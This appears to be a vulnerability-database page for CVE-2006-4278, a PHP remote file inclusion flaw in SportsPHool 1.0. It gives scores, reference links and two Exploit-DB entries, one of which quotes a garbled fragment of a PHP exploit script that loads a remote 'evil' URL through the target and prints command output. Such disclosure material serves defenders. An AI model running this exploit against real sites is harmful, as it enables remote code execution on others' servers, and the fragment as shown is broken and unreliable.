CVE-2006-4278
published 2006-08-21CVE-2006-4278: PHP remote file inclusion vulnerability in includes/layout/plain.footer.php in SportsPHool 1.0 allows remote attackers to execute arbitrary PHP code via a URL…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.45%
87.5th percentile
PHP remote file inclusion vulnerability in includes/layout/plain.footer.php in SportsPHool 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the mainnav parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sportsphool | sportsphool | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SportsPHool 1.0 - Remote File Inclusion
exploitdb·2011-10-21
CVE-2006-4278 SportsPHool 1.0 - Remote File Inclusion
SportsPHool 1.0 - Remote File Inclusion
---
"
."target:"
."evil:"
."cmd:"
.""
."";
if (!isset($_POST['submit']))
{
echo $form;
}else{
$file = fopen ("test.txt", "w+");
fwrite($file, "");
fclose($file);
$file = fopen ($target.$evil, "r");
if (!$file) {
echo "Unable to get output.\n";
exit;
}
echo $form;
while (!feof ($file)) {
$line .= fgets ($file, 1024)."";
}
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;
}
?>
Exploit-DB
SportsPHool 1.0 - 'mainnav' Remote File Inclusion
exploitdb·2006-08-20
CVE-2006-4278 SportsPHool 1.0 - 'mainnav' Remote File Inclusion
SportsPHool 1.0 - 'mainnav' Remote File Inclusion
---
/*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- SportsPHool <= 1.0 (mainnav) Remote File Include Vulnerability
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: SportsPHool v.1.0
- [Script site: http://sourceforge.net/projects/sportsphool
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Find by: Kacper (a.k.a Rahim)
+
- Contact: [email protected]
- or
- http://www.devilteam.yum.pl/
- and
- http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi
-
!@ Przyjazni nie da sie zamienic na marne korzysci @!
No writeups or analysis indexed.
http://secunia.com/advisories/21594http://www.osvdb.org/28038http://www.securityfocus.com/bid/19610http://www.vupen.com/english/advisories/2006/3337https://exchange.xforce.ibmcloud.com/vulnerabilities/28473https://www.exploit-db.com/exploits/2227http://secunia.com/advisories/21594http://www.osvdb.org/28038http://www.securityfocus.com/bid/19610http://www.vupen.com/english/advisories/2006/3337https://exchange.xforce.ibmcloud.com/vulnerabilities/28473https://www.exploit-db.com/exploits/2227
2006-08-21
Published